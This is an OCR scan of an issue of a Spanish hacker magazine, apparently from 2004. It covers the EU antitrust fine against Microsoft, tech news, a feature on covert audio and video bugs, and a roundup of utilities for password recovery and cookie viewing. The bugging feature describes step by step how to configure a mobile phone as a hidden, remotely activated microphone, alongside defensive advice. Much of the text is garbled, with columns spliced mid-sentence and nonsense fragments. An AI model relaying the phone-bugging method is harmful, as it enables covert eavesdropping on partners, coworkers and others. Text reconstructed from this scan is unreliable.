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Los artículos contenidos en 
Hacker Journal tienen un objetivo 
netamente didáctico y divulgativo» 
El editor declina toda 
responsabilidad sobre el uso 
inapropiado de las técnicas y de 
los tutoriales descritos en la 
revista. El envío de imágenes 
autoriza implícitamente la 
publicación gratuita en cualquier 
publicación, incluso si ésta no 
forma parte de WEver S.r+.1. Las 
imágenes enviadas a la redacción 
no podrán ser restituidas.. 


Copyright 4ever S.rl, 

Todos los contenidos son Open Source 
para su uso en el Web. Se reserva y 
protege el Coyright para la impresión 
para evitar que algún competidor 
aproveche el fruto de nuestro trabajo 
para hacer negocio 


hacker (hák'or) 
“Persona que se divierte explorando los detalles de los sistemas de programación y 
expandiendo sus capacidades, a diferencia de muchos usuarios que prefieren 
aprender solamente lo mínimo necesario.” 


n el último número nos preocupábamos especialmente de las cepas de vi- 

rus que proliferan por Internet, La epidemia se encuentra lejos de remitir, 
pero lo cierto es que la realidad sigue acumulando noticias que merecen nues- 
tra atención. En esta ocasión, sin duda, la noticia estrella de nuestro mundillo 
es la multa a Microsoft en Europa. 

El gigante de Redmond acumula una experiencia nada envidiable de litigios 
ante los más diversos tribunales. Dejando de lado las causas relacionadas con 
la libre actividad comercial, muchos de los procesos seguidos contra Microsoft 
provienen de sus prácticas monopolísticas. Estas prácticas han encontrado u- 
no de sus campos abonados la adición de u- 
tilidades en sus sistemas operativos, En 
principio ésta sería una buena idea, avalada 
por la costumbre inveterada de comple- 
mentar lo imprescindible del sistema con 
programas y utilidades que amplían y me- 
joran su uso. Sin embargo, el caso de Micro- 
soft es totalmente peculiar porque, mientras 
que las distribuciones de Linux, por ejem- 
plo, acumulan programas en los CDs y el u- 
suario es quien decide qué quiere instalar y 
cambiar (en la instalación o más adelante, cuando quiera), Windows se empe- 
ña en contener utilidades profundamente enraizadas en el corazón del siste- 
ma. El primero fue Internet Explorer, que llevó a Microsoft a afirmar que 
era imposible deslindar el navegador del resto del sistema operativo, Sin 
embargo, los tribunales no cedieron. Microsoft apeló, y por lo que sabe- 
mos aún no ha cumplido todos los términos de los veredictos que hacían 
al caso. Es curioso hasta qué punto una empresa tan poderosa puede de- 
mostrar que la justicia es materia de discusión, incluso cuando dicta sen» 
tencia y condena. 

Ahora llega el momento de Windows Media Player. La misma monserga: 
¿qué harán los pobres usuarios si se les quita el esencial reproductor de Win- 
dows? Pues lo que han hecho siempre: probar la oferta disponible y quedarse 
con el que más les guste, 
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UNA REDISTA PARA TODOS 


MEW 


El mundo hacker se compone de algunas cosas simples y otras complicadas, Hay curiosos, lectores 
sin experiencia y expertos para los cuales el ordenador no tiene secretos, Cada artículo de Hacker 
Journal está marcado con una cluve para cada nivel; MEWBIE (para quien comienza), MIDHACKING 
(para quien ya está dentro) y VANDHACIONG (para quien no existen los secretos), 
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¡BIZ y: NIDOS A NUZS'TRE 


AO (USER: SECREG 
¡ENTANTADOS DE LEZROS TAMBIÉN A VOSOTROS! PASSWORD: D4B4L3 


Demostra- 
dlo al mundo y a vosotros mismos intentando superar los 
diez niveles de dificultad del juego Try2Hack (try to hack), 
presente en nuestra web www,.hacker-jounal.com. El juego 
consiste en superar los niveles, insertando cada vez la pass- 


A ¡ 
6 l word correcta (se puede NBgar de otros modos a las paginas 
| protegidas con COTA) ara hacerlo, tal vez necesites al- 
2) gunos programas (Macromedia Flash, Softice, VisualBa- 
| a sic).No podemos asegurar que todo funcione exactamente 


como se debe. 
¿Habéis entendido? 


"Envía un mensaje a escribiendo el nivel al que has llegado y los passwords de todos los 
| q y p 
niveles superados. Próximamente publicaremos la clasificación de los mejores" 
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O pagas o apretamos. Además de 
pagar, antes de 90 días, el tío Bill ten- 
drá que lanzar al mercado una versión 
de Windows en la que ya no esté 
Media Player, evidentemente sin cos- 
tes añadidos para el usuario. Y, en un 
plazo de 120 días, Microsoft tendrá 
que dar a la competencia la informa- 
ción para que otros programas pue- 
dan integrarse lo mejor posible con el 
sistema operativo montado en los ser- 
vidores de gama baja. También para 
las aplicaciones que se realicen en el 
futuro. No hay nada que hacer en 
cuanto al código fuente cubierto por 
los derechos de propiedad intelectual 
y, para tener aunque sólo sean partes, 
los productores de software lo tendrán 
que comprar a Microsoft. 


El antitrust de la Unión E 


li a Eh E ay yA] E 
MA Sa clonado a 


uropea 


Mic crosoft con 


le) por nunca impuesta, 


decirlo de golpe es algo estratosféri- 
co: algo más de cuatrocientos noven- 
ta y siete millones de Euros. Y aún así 
es sólo cerca de un 1,6% del volumen 
total de negocios de Microsoft en el 
mundo. Es como hablar de avellani- 
tas, de piedrecillas en le zapato, para 
una empresa que ha declarado tener 
una caja fuerte de 45.000 millones de 
Euros, sólo en líquido. (Sniff...). Haría 
falta que perdiera 100 juicios más 
como este para de verdad causarle 
problemas al gigante de Redmond. 


Agujero en 
el dique 


Hace 
sólo diez años los competidores de Bill 
Gates eran potencialmente todos, 
millones de desarrolladores de todo el 
mundo. ¿Y cuántos son hoy? Tres, 
puede que cuatro. 

Pues no señores. No podemos conti- 
nuar comprando PC que tengan ins- 
talado un único sistema operativo, sin 
tener opción a decidir cómo queremos 
que funcione nuestro ordenador. Unos 
pocos han intentado pedir la desins- 
talación y el reembolso, pasando por 


LA ACUSACIÓN 

El comisario europeo para la competencia Mario 
Monti: "una competencia no distorsionada com- 
porta mejores resultados para el bien de los con- 
sumidores y este 
precedente permite 
establecer como 
proceder en casos 
similares en el futu- 
ro", En cuanto a la 
determinación de 
una multa "propor- 
cionada y equilibra- 
da" ha dicho que "no está tomada a la ligera sino | 
que es el resultado de cinco años de investiga- 
ciones, de largas discusiones con nuestros exper- 
tos y de consultas con los 15 estados miembros", 


LA REACCIÓN 

Microsoft apelará contra la decisión del Anti- 
trust (pero a ello Monti ha dicho estar seguro | 
de ganar también el recurso"). "Aunque con- 
sideramos que la decisión de hoy es equivoca- 
da -ha dicho el CEO de Microsoft, Ballmer - 
continuaremos colaborando y cooperando con 
los gobiernos y la industria europea para afron- 
tar temas compartidos, como la interoperabi- 
lidad, la seguridad, la privacidad, el spam y la 
tutela de menores en red". 


LA BATALLA DE LOS DIEZ AÑOS 


a Comisión Europea le está pisando los 
tacones a Microsoft desde 1994. Todo 
empezó cuando la UE acusó a Microsoft de uti- 


lizar sus patentes de manera ilícita, para blo- 


quear a la competencia. Microsoft prometió algu- 
nos cambios en su estrategia comercial. Más 
tarde, en 1997, el tío Bill volvió a ser acusado de 
no respetar los acuerdos de 1994. Se firmó otro 
compromiso, En 1998 Sun Microsystem denun- 
ció a Microsoft en el antitrust europeo por abu» 


extra- 
terrestres 
en un mundo unifor- 

memente conformado o teniendo que 
hacer saltos mortales entre artículos 
y licencias (http://attivissimo. homeli- 
nux.net/rimborso_windows/istruzioni.ht 
m). Quizás ahora se ha abierto una 
pequeña grieta en el sistema. No hay 
duda de que se ha hecho un agujeri- 
to en los diques y no hay dedito de tío 
Bill que pueda taparlo... ¿La explosi- 
va fuerza del agua hará su trabajo has- 
ta el final? 


No todo el mal... 


WHICI e Je l | 

comel ) ha 
dejado claro que un sistema operati- 
vo sin Windows Media Player no per- 


so de posición dominante, por no publicar la 
información que permita a Windows dialogar con 
servidores de la competencia. A principio del 
2000 el antitrust oficializó la demanda contra 
Microsoft por violaciones del mercado relacio- 


nadas especialmente con Windows 2000. Inició 


mitirá a los usuarios ver una canti- 
dad impresionante de sitios web, 
basados en archivos multime- 
dia en formatos adaptados 
a Media Placer. Y entre 
estos, según palabras 
del gran jefe de Micro- 
soft Steve Ballmer, 
"hasta el sitio del 
parlamento italia- 
no". Ahí queda eso. 
¿Cómo ha termina- 
do el giro hacia 
Linux, al que hace 
un tiempo había 
apuntado incluso la 
Comisión Europea? 


De entrada, las pre- 
misas están todas. Basta de 

poderes prepotentes, adelante con 
el shared. La libertad digital también 
consiste en esto. 


el ataque definitivo. En el 2003 un ultimátum de 
la Comisión Europea con una propuesta de mul- 
ta por valor de mil millones de Euros, por viola- 
ción de posición dominante. Por fin, llega el 2004 
y se intenta negociar un compromiso, pero las 
negociaciones cesan sin acuerdo el 17 de mar- 


Microsoft CONDENADA 


NO NOS HAGAMOS ILUSIONES 

Hace un tiempo Microsoft fue condenada por 
el antitrust de los Estados Unidos a ser des- 
membrada y a pagar multas muy cuantiosas. 
Una serie de recursos y de alegatos han evita- 
do la división y redu- 
cido notablemente 
las multas. Microsoft 
ya ha anunciado que 
recurrirá a la multa 
comisionada por la 
Unión Europea y ya 
han empezado las 
presiones internacio- 
nales. Personajes 
destacados del 
gobierno y del parla- 
mento americano 
han criticado la sentencia definiéndola como 
*un error". Ya veremos... 


zo, cuando Microsoft rechaza comprometerse 
de cara al futuro, especialmente para hacer que 
Windows sea accesible para la competencia, y 
su sucesor en desarrollo, para poder incluir pro- 
ductos alternativos a Media Player. El final ya lo 
sabemos. 


3 GOOGLE ATACA CON EL CORREO GMAIL 


E ofrecerá Med 


próximamente |: archivo 
(probablemente |: o..." 


Edición Yer Favoritos 


http: /fwww.google.es/ 


Herramientas 


Ayuda 


cuando leas esto |; 
ya estará en fun- 
cionamiento) un 
servicio de correo | 
electrónico web 
gratis con 1 GB de 
almacenamiento, 
La Web 


qe M le 


Imágenes 


España 


Grupos Directorio News ¡Nu 


entre otras mejo- 


Búsqueda en Google Il 
Búsqueda: O la Web O páginas en español C 


Google.es ofrecido en: 


Publicidad - Todo acerca de G 


Voy a Tener Suerte ] Herramientas del idioma 


) páginas de España 
alego euskara 


catalá c 


vogle - Google.com in English 


allá delas 


¡Haga de Google su página iniciall 


das, en u- | 
wa globalización | 
del conflicto. Goo- | 
gle cuenta con| 
una salut de hie- 
rro que le permite 
tratar de tú a tú alos grandes. 
En una estrategia esencialmente práctica, Goo- 
gle no ha presentado, como otras veces, un 
producto innovador, sino que ha tomado un ser- 
vicio sobradamente conocido como es el co- 
rreo gratuito basado en el web y ha repetida la 
fórmula que le ha funcionado con su buscador: 
el hardware es barato, por lo tanto vale la pena 
aportar mucho hardware. 1 GB de almacena- 
miento por cuenta de correo o la posibilidad de 
recibir mensajes de hasta 10 MB son cifras es- 
calofriantes. Si a ello se suma la capacidad de 


02004 Google - Buscando 4,285,199,774 páginas web 


A 


búsqueda por los mensajes, las cosas se ponen 
interesantes. Esta oferta deja en mantillas la o- 
ferta de sus rivales, que sin duda deberán reac- 
cionar para no quedar fuera de juego. 

El correo GMail, al basarse en servidor web, 
significa que la información del buzón de correo 
será accesible desde cualquier navegador del 
mundo. Con estas armas puede dejar fuera de 
juego a servicios como el decano Hotmail, 
comprado por Microsoft y desde entonces po- 
co valorado, También Yahoo! Mail, que arreba- 
tó en su momento el liderato a Hotmail, tiene 
motivos para reaccionar, 


D NUEVO TELÉFONO MÓVIL PARA INVIDENTES —[] 


NCE y Telefónica Móviles lanzan un teléfono 

móvil para invidentes. Fabricado por 
Owasys, tiene un precio recomendado de 400 
euros, 
El nuevo teléfono móvil para invidentes es el 
primero de estas características en el mercado 
español y europeo. Sus servicios funcionan Ín- 
tegramente mediante locuciones y ha sido fa- 
bricado por Owasys. 


Este teléfono comu- 
nica al cliente, por 
medio de la voz, la 
llegada de mensa- 
jes, las llamadas en 
espera o perdidas y 
el nombre o número 
de la persona aus 
llama, -usuIa 


El nuevo terminal, llamado Owasys 22€, se 


n los centros de distribución de 


je la ONCE de diversos puntos de 

recio recomendado es de 400 eu- 
¡integrado en el programa de puntos 
ica MoviStar. 


| presidente de 

Microsoft, Bill 
Gates, ha ofrecido 
detalles sobre el |: orec< 
próximo sistema [py E ms: 
operativo de la Ss 
compañía, 'Long- || msdn 
horn', que estará a || 
la venta entre | "SON Home 
ZOO ZOO El] Suere for 
'software' ofrece 
nuevos métodos 
de almacenamien- 
to (WinFS), nue- 
de ro y l Headline Archive 
Según Gates, 
'Longhorn' consti- 
tuye la principal 
novedad desde 
que se lanzó Win- 
dows 95. El presi- 
dente de Micro- || 
soft prometió in- 
cluir en la próxima 
generación del. 
isoftware' avan-" 
ces como la tecnología de reconocimiento de 
voz, servicios telefónicos integrados o mejoras 
en la capacidad gráfica. 
Durante el discurso, un empleado de Microsoft 
dio una demostración de 'Longhorn', resaltando 
entre otras presentaciones una barra lateral, un 
área en el lado derecho de la pantalla, capaz de 


| ANMSDN 
Advanced Search 


Longhorn Developer 
Center Home 


Product Information 
Understanding Longhorn 
PDC Materials 
Cormmunity 

Tools k Code Samples 
Support 


Products € Technologies 


"New MSD 
Subscriptio ” 


3 Longhorn Developer Center - Microsoft Internet Explorer 
Archivo Edición Yer  Eavoritos Herramientas Ayuda 
el http: //msdn,microsoft,comflonghorn/ Es 


> E 


Microsoft.com Home | Site Map 


Library Downloads Code Cente 


Microsoft" Windows” Code-Named “Longhor 
Beginning a technology wave that will define the digital decade 


Developer Centers 


MSDN Homa > Longhorn Developer Cantar Home 


Write Asynchronous, Statef. 
Services with the Indigo Se 
Explore the attribute-based pro 
*Indigo" for writing Web service 
Indigo programming model witl 
programming model, then walk 
samples. 


Code hane 


Longhorn 


Aj Inside Avalon: The Blinking Lights Division 
Learn about the Media Integration Layer, the low-le 
"Avalon," the presentation subsystem in Longhorn. 


MSDN Webcast: Managed and Native Code in L 
Existing C/C++ Applications 


D 


mostrar dinámicamente listas de mensajes, 
precios de acciones, noticias y fotos. 

El sistema operativo será una herramienta más 
útil para navegar por la información. En lo que 
se refiere a la interfaz, no se espera que Micro- 
soft dé demasiadas pistas, en parte debido a 
los temores de que otros copien las ideas. 


> PRINCE VENDE SU MÚSICA EN INTERNET 


E popular y original cantante Prince ha a- 
nunciado la apertura de un portal de venta 
de música en Internet, en el que ofrecerá sus 
propias canciones a precios rebajados. La ¡- 


niciativa fue calificada por el cantante como | 
"el primer comercio independiente de descar- 


ga que es propiedad de un artista". 
El cantante de Minneápolis ha anunciado el 
lanzamiento del Musicology Download Store 


en un comunicado divulgado en el sitio de In- | 


ternet NPG Music Club, 

El web será un punto de venta de su nuevo 

álbum Musicology, que se pone a la venta en 

aña, a través del sello Columbia Records, 
/ Music, el próximo 19 de abril (el 20 

1 EE UU), y del resto de sus canciones inde- 

pendientes. Al igual que otros sitios de des- 

“carga de música, Prince ofrecerá cada can- 

ción por 99 centavos de dólar, 

La malas relaciones de Prince con la industria 


DD MO AMAS CAINE | CTiciad lor ol Princ aroa Flv 20 > Mac roll Inteco E splernr 
brdome Eáción yor Esvotos Ejvmiertas Ayuda 
0 rec hee rogar compro pex. 
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musical vivieron sus peores momentos en 
1996, el año de su ruptura con Warner Bros. 
Desde entonces, el artista decidió encargarse 
personalmente de la distribución de sus álbu- 
mes. 
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Gracias a la miniaturización y a la reducción de los costes, 
micrófonos ambientales y transfífSores están al alcance de 
cualquiera. Y con un poco de inventiva se pueden adaptar 
aparatos de uso común para transformarlos en microscópicos. 
¿Cómo defenderse de esta nueVililmenaza tecnológica? 


eucci, Marconi y Bell no 
podían imaginar qué 
estaban desencadenan- 
do... Estos personajes 
que han revolucionado 
las relaciones interper- 
sonales en el seno de la sociedad, 
entre los gobiernos, los ejércitos, no 
podían ni imaginarse que aquellos 
grandes aparatos que habían inven- 
tado, hoy se habrían convertido en 
"chucherías al alcance de los niños", 
por cuanto han sido reducidos hasta 
parecer juguetitos. Estos juguetitos se 
denominan "chinches" o más técnica- 
mente microtransmisores. 

Si hasta hace unos años, estos apara- 
tos estaban al alcance sólo de las 
fuerzas del orden, investigadores pri- 
vados y espías profesionales, hoy, 
' gracias a las reducciones de costes y 
a la facilidad de acceso (debida tam- 
bién a Internet), están al alcance de 
cualquiera. 

Como sucede con otras tantas cosas, 
el hecho que sea relativamente fácil y 
económico conseguirlos no significa 
que su uso indiscriminado sea legal. 


A lo largo de este artículo encontra- | 
réis referencias a las leyes que regu- 
lan esta materia. 

Por ahora nos ocuparemos de ver qué 
tipos de bichos microscópicos existen, 
para comprender hasta dónde llega 


la amenaza a la privacidad de cada | 


cual... 


| >> Los 
| 'microtransmisores 


| 


Los microtransmisores sin hilos son 
autónomos, de fácil instalación y se 
pueden conseguir fácilmente en cual- 
quier tienda de electrónica ya cons- 
truidos o para montar. 

Los inalámbricos transmiten normal- 
mente en UHF (Ultra High 
Frequency) en modulaciones de fre- 
cuencia (FM) en las frecuencias de 
400 a 800 MHz, tienen una poten- 
cia de antena del orden de mW, (50 
mW, 100 wM) y un alcance de 30, 
60, 80 metros. Estas miniaturas pue- 
den tener diversos formatos y aspec- 


tos según el diseño de construcción, 
y en general están hechos para ser 
ocultados en objetos de uso cotidia- 
no. 

En los últimos años se han multipli- 
cado las tiendas especializadas en 
aparatos para la vigilancia por audio 
y vídeo, que gracias a Internet ahora 
pueden ofrecer su propio catálogo 
en todas partes; a menudo estas 
tiendas tienen nombres referidos al 
espionaje, y los productos ofrecidos 
recuerdan a veces el armamento que 
el doctor Q equipaba al agente 007 
en las películas de James Bond, 


¿Además de micrófonos y videocáma- 


ras, frecuentemente venden también 
máquinas de la verdad, accesorios 
para sanear entornos y armas de 
defensa personal, como los sprays 
irritantes. En el "supermercado del 
espía", en realidad los precios son 
más bien altos: a partir de unos 200 
euros por un kit compuesto de un 
micrófono con transmisor y receptor, 
pero se llega rápidamente a los 
1000 euros o más por un bolígrafo, 
una calculadora o un falso móvil que 


ocultan micrófono y transmisor, 

Si además del audio se quiere gra- 
bar también la imagen, con foto o 
vídeo, los precios siguen subiendo, 
Se encuentran videograbadoras par- 
ticulares, que capturan sólo cuando 
perciben un movimiento en la habi- 
tación "espiada" y que pueden gra- 
bar muchas horas de vídeo en una 
sola cinta, 


>> Soluciones econó- 
micas para tipos prác- 
ticos 


Si estos fueran de verdad los costes 
para poner bajo control un entorno o 
una persona, probablemente serían 
pocas las personas que podrían per- 
mitirse espiar un marido o una espo- 
sa, un colega, un dependiente o un 
jefe. Sin embargo, para quien tiene 
un mínimo de práctica en electrónica, 
y un poco de inventiva, el coste de 
realizar un aparato de vigilancia 
puede reducirse a pocos euros. 

Las tiendas de electrónica venden de 
hecho kits para construir micrófo- 
nos con transmisores a partir de 5 
- 10 euros, Muchos de estos kits 
económicos transmiten en la 
banda de las radios FM norma- 
les, y por ello no es preciso 
siquiera comprar un receptor 

dedicado (aunque en este caso 

es posible que alguien más - incluso 
el propio sujeto espiado- pueden oír 
las conversaciones en su propia 
radio). 

Incluso quien no se maneja con los 
condensadores y el soldador puede 
improvisar diversas soluciones con 
objetos de uso común. Basta deshabi- 
litar los sonidos y vibraciones de un 
móbil, configurarlo para que respon- 
da automáticamente las llama- 
das (una opción que a menudo 
se presenta como "respuesta 
manos libres"), conectarle un kit 
de auricular (que tiene un 
micrófono de amplio espectro y 
puede silenciarse quitando el 
auricular), y he aquí un transmi- 
sor de interesantes característi- 

cas. Se activa remotamente (basta 
marcar su número), capta los sonidos 
emitidos en un radio de varios 


MICRO 
TRANSMISORES 
CAMUPLADOS 


/ Batería del móvil con 
MicroTX 

Beh es una simple bate- 
ría con un micró- 
fono que captura 
MS 
acústicas y las 
transmite. 


Boligrafo con MicroTX 

Es más fuerte el bolígrafo 
que la espada, espe- 
cialmente si no es un 


tiene un micrófono y 
transmite hasta 300 
metros. 


Calculadora con 
MicroTX en UHF 
¿Una calculadora de 500 ,* 
euros? Sí, pero tiene un 

micrófono y un transmisor 
que cubre una gran distancia. 


MicroTX del tama- 
ño de 1 euro 

Este micrófono puede ins- 
talarse en cualquier sitio y 
tiene la característica de ser 
“always on”, es decir, siem- 
pre conectado. 


MicroTX con hilos 
jivarizado 

Este micro transmisor es 
particularmente peque- 
ño pero muy sensible, 
pero como todos los dis- 
positivos eléctricos 
requiere alimentación. 


Micrófono con pará- 
bola 
Un 
micro altamente sensi- 
ble y fuertemente 
direccional, insertado 
en el foco de una 
parábola, que recoge 
incluso las señales 
débiles y las hacen audibles hasta 
varias decenas de metros. 
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boli normal. Este con- | 


N 


Un teléfono móvil con un micrófono sensi- 

ble, con los sonidos deshabilitados y confi- 
gurado para responder automáticamente a 
las llamadas entrantes, puede transformar» 
se en un micrófono que se activa a petición 
y transmite a todo el mundo. 


metros, y puede transmitirlos hasta el 
otro lado del mundo, aunque sólo sea 
un teléfono activo por el coste de una 
llamada. 

Algunas videocámaras recientes tam- 
bién permiten grabar sólo cuando 
perciben un movimiento o entrada en 
su campo visual. Se trata de una fun- 


“zi, cionalidad estudiada para los fotó- 

“e 

E, grafos de la naturaleza, que pue- 

5% den dejar la videocámar 

e en dejar la videocámara en un 
e id 


== bosque y grabar sólo cuando el 
sensor de infrarrojos detecta un ani- 
mal (o una persona) en movimiento 
ante el objetivo. 


>> Cuando el espía es el 
ordenador 


Si hablamos de aparatos "versáti- 
les", ninguno lo es tanto sin duda 
como lo es un ordenador, Con el 
programa y los accesorios ade- 
cuados se puede hacer cualquier 
cosa, El método más elemental 
para espiar la actividad informá- 
tica de una persona es instalar 
un caballo de troya, es decir, un 
programa que permite el control 
total del ordenador en el que está ins- 
talado. Nuestro espía podría ver una 
imagen de nuestra pantalla, y descar- 
gar cualquier archivo presente en el 
disco duro. Si esto ya es preocupante, 
recordad que algunos troyanos pue- 
den incluso guardar las teclas pulsa- 
das y enviar periódicamente un men- 
saje con el texto escrito en cualquier 
programa (letras reservadas y contra- 


= PRIVACIDAD .M 


CHINCHES, MICROSCOPIOS 


Espías de película 


La miniaturización y la vigilancia 
son protagonistas en la película 
Enemigo público, con Will Smith y 
Gene 
Hackman. Un 
ciudadano 
normal que se 
encuentran en 
el lugar equi- 
vocado en el 
momento 
inoportuno 
acaba en pose- 
sión de pruebas 
comprometedo- 
ras contra un 
renombrado 
político. Sin ni 
siquiera saber el 
motivo, su vida 
es monitorizada 24 horas al día 
mediante los potentes medios de la 
NSA, la agencia americana que entre 
otras cosas gestiona Echelon. 
En el romance Distraction de Bruce 
Sterling, se emite la 
hipótesis 
de que 
en el 
2020 los 


micro- 


MAREAAr 


F THE STATE 
7 


TT 


ENEMY O 
chips 

serán tan 

accesibles 

y econó- 

micos que 

nadie se 


wit 


q ENEMY OF 
h 


P ll 


preocupa- 
rá de recu- 
perarlos 
tras su 
uso: por lo tanto, quedarán activos 
durante años en oficinas, casas y 
lugares públicos. Cualquiera podrá 
escuchar lo que se dice con una 
simple radio. Por eso, nadie puede 
estar nunca seguro de que una con- 
versación reservada lo sea realmen- 
te. Una lectura sumamente i¡ntere- 
sante, 


| 


Y VIDEOVIGILANCIA 


señas incluidas), y pue- 
den incluso activar los 
eventuales micrófono y 
webcam para transmitir 


audio y vídeo por 
Internet. 
Con la conexión de 


banda ancha siempre 
activa (ADSL, cable...), 
un ordenador perma- 
nentemente conecta- 
do puede convertirse 
en un potente equipo "Muchos tro 
de espionaje, listo Pa pantalla 
para captar toda . 
palabra pronuncia- 


pantalla y ver qué sucede en la 
habitación donde se encuentra. Es 
para echarse a temblar. 


>> omo 
defenderse 


De acuerdo, probablemente | 
ninguno de vosotros se 
encuentra en el punto de mira 
de un malintencionado que ha 
decidido dedicar su tiempo a 
espiar todo lo que 

hace. Pero la 
prudencia 
nunca es exce- 
siva, y una 
sana dosis de 
paranoia 
siempre puede 
resultar útil. En 

el comercio se 
encuentran 
diversos kits 
para la limpieza | 


e” 


X 


ambiental que Pa 
llevan a A 
cabo un A > 
repaso ( > | 


de todas las 

frecuencias en busca 
de una portadora de intensi- 
dad superior al ruido de 
fondo. Si se encuentra una, 
significa que probablemente 
en la vecindad existe un trans- 
misor, A un nivel elemental, se 
puede efectuar una operación 
parecida usando una simple 
radio común, cambiando len- 
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tamente la 
sintonía hasta 
cubrir toda la 
gama de fre- 
cuencias. Pero 
es evidente 
que esto cubre 
sólo la gama de 
frecuencias uti- 
llizadas comer- 
cialmente (por 
ejemplo en el 
caso de la radio 
FM, de 88 a 108 
MHz), y si el 
espía es mínima- 
mente inteligente 
evitará utilizar 
para sus propósi- 
tos estas frecuencias. En las 
tiendas especializadas, los 
escáneres para la limpieza 
ambiental son muy caros (a 
partir de unos mil euros los 
¡más baratos), y además hay 
que saber utilizarlos bien, de 
lo contrario se corre el riesgo 
de tener una "falsa" sensación 


de seguridad determinada por ' 


haber llevado a cabo un repa- 
so aproximado. 
Si la reserva es 

un tema funda- 
mental, convie- 
ne pues acudir 
a un especia- 
lista que inter- 
vendrá con su 
propio instru- 
mental y su 
capacidad 

” para anali- 


- 
“e z vr 
> 
sr " Q—A 
ta Po e 
pt 


E-> 
ambientes y líneas telefónicas. 
Sin recurrir a ciertos medios, 
basta con un poco de prudencia: 
si se tiene que mantener una 
conversación realmente reser- 
vada, no hay que tenerla en la 
oficina o en casa; es mejor bus- 
car lugares abiertos y ruidosos, 
donde las interceptaciones son 
más difíciles. a 


LA A A DEL BUEN HACKER: 


odo hacker cuenta con un 
ertomúmero de programas 
jue usa con pasión y tal 1ez 
escribe añadidos de SU/puno y 
etra, Veamos como funcionan 
jaonde se encuentranalqunas 
elas utilidades más 


Miiizadas;, 


e todo, absolutamente 
od, sobre cualquier cadena 


Ira [A am 


FEU ERUOoO ZU y 


“0 MUAÓ:O6 abot ar9:1030 — COMMECT TCP 1090101360 IDAS 


[ot 21 pun + A 


de datos transmitida a través dd 
los puertos de nuestro PC es re- 
almente difícil. Port Explorer es 
capaz de proporcionar esta infor- 
mación y de hacer otras lindezas 
como localizar geográficamente 
el origen de una transmisión de 


Tica licuición— Trmgaaióon Tama 18 


hat Pr Cra Já 


datos o tracear un paque- 
te para ver qué recorrido 
ana] SÍQUe y 
cuánto se de- 
mora en cada ser- 
ans | vidor. El sitio para” 
descargar esta joya 
les  http://www.dia- 
—3| mondes.com.au/por- 
|texplorer/. Tras ha- 
ticas s ber probado durante 
un mes el programa, 
cor decidir si pagar cerca 
de 30 dólares a DiamondCS pa- 
ra obtener la licencia de uso. De 
todos los modos de gastar 30 
dólares en la Red, éste podría 
resultar ser uno de los más pro- 
vechosos. 


LA CABEZA 


2 - 
y 
de 


Ji .5 -welitiack_ test.oub 


Accodk Search View Tools Help 


sados de nuestro correo 
”l electrónico o, peor aún, de 
nuestro PC, y vernos obliga- 
dos a pasar horas crackean- 
do nuestros propios archivos. 
Para evitar esta embarazosa 
e inconfesable situación, Ou- 
bliette se ofrece para recor- 
dar por nosotros nuestras 
contraseñas y conservarlas a 
salvo de miradas indiscretas, 
Lógicamente, también Ou- 
bliette tiene una contraseña, y 
si la olvidamos el desastre es 
total, pero al menos el esfuer- 
zo mnemónico está al alcance 
de los más ocupados con mu- 
chas cuentas. Oubliette es 
gratis y se puede descargar en 
http://www.tranglos.com/ 
free/. El programa es Open 
Source y, si nos gusta progra- 
mar, podemos personalizarlo 
como queramos. 


Accourk information 


Agcount: 1011 
$) mywebAntack > 


Lsomamne 


[jes contraseñas deberían 
ser: difíciles de adivinar, 
' complicadas de escribir, con 
y números y letras mayúscu- 
¿las y minúsculas y posi- 
de XK. blemente con algún 
A “carácter ASCII no dis- 

Yponible en el teclado. De- 
bido a que luego no es nece- 
ario escribirlo en ninguna 
parte, tarde o temprano corre- 
mos el riesgo de vernos expul- 
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que sin duda les honra. Si / 
“ltenemos problemas con a Bo fia ás | 
una contraseña > E e% pan Se $ 

de cualquier do- 
cumento de Of- 
fice, podemos 


á 


cover ¡t! < 


visitar — http:// o Llei 
WWW.pass- rer. Si tenemos acceso 
wordrecoveryto- [ras —Tacmsesosio— [medredoss Tcesedoss—= Otros equipos. a travé 


ols.com/, donde 
hay programas 
para recuperar 
contraseñas es- 
A se han especializa-  pecíficas para cada 
o en la recuperación de aplicación.  Tenlo 
contraseñas olvidadas, cosa siempre a mano, 


a oa de la red, lECookieVie 
z- permite abrir y modif 
=wse car las cookies preser 
"f tes en equipos remote 
Ly guardar el contenid 
wr de esos archivos. De: 
"carga ya la versión 1.5 
es este práctico instri 
mento conectando cc 
el sitio http://nirsoft.tr 
ancelar todas las cookies pue- pod.com/. Una sola recomende 
den hacerlo muchos, pero ción: si no te gustan los popup: 
abrirlas, modificarlas y seleccionar- activa un programa de protecció 
las para hacer con ellas lo que de las pesadas ventanitas antes c 
queramos es más divertido y útil. — ir al sitio de lECookie; su autor di 
lECookieView es un pequeño pro- ¡a como freeware su programs 
grama gratuito que per- pero en contrapartida cree ql 
mite hacer esto y más nuestro monitor puede contens 
interactuando  perfecta- más ventanas que un palacio nec 


mente con Internet Explo= clásico. 


a 


25 Cookies, 1 Selected 3 Cochie(s) 


n el sitio http:// 
D Select the service you want lo connect www.militia.co.uk/ po- 
12) 10, andthen entes you user name and demos descargar uno de 


password. 


00 rr los más simples y eficaces 
programas para recupe- 
User name: lamer 


rar contraseñas de cua- 
Baron um dros de texto. Militia Pass- 
print word Revealer es gratuito, 
/ Ca como otras dos o tres ex- 
travagancias que se en- 
cuentran en este sitio. 


Sam Spade incluye numerosos 
módulos de control del tráfico en 
la red, verificación de los servido- 
res, traceroute, finger, whois y su- 
ma y sigue. En el sitio 
http://www.samspade.org/ssw/d 
ownload.html podemos descar- 
| gar este software gratuito y utilísi- 
o mo, mientras que si nos quere» 
— e ste programa es para un nave- mos divertir un poco sin instalar 
- = gante experto lo que una na- nada, ya puestos, hagamos un 
se vaja suiza es para un explorador: salto a  http://www.samspade 
no se puede salir de casa sin él. .org/1/. 


Connect Se 


¡ el spamming es un pro- 
blema, una primera de- 
fensa puede llegar gracias a 
SpamPal, que es gratis, pe- 
queño y simplicísimo. Lo en- 
contramos 


en el sitio 


equeño, ligero y eficaz, Purge IE 

funciona como una escoba que 
pasa por encima de nuestros pa- 
sos para evitar que alguien que 
acceda a nuestro equipo puda sa- 
ber qué hemos hecho por Internet. 
El programa se puede descargar 
de http://www.purgeie.com/, se 
puede utilizar 15 veces y luego es 
preciso pagar unos 20 dólares. La 
versión Pro es algo más rica en 
funciones, pero cuesta diez dóla- 


res más. 


http://www.spam- 
pal.org/ y lo Único 
que hay que hacer 
con atención una 
vez descargado e 
instalado el pro- 
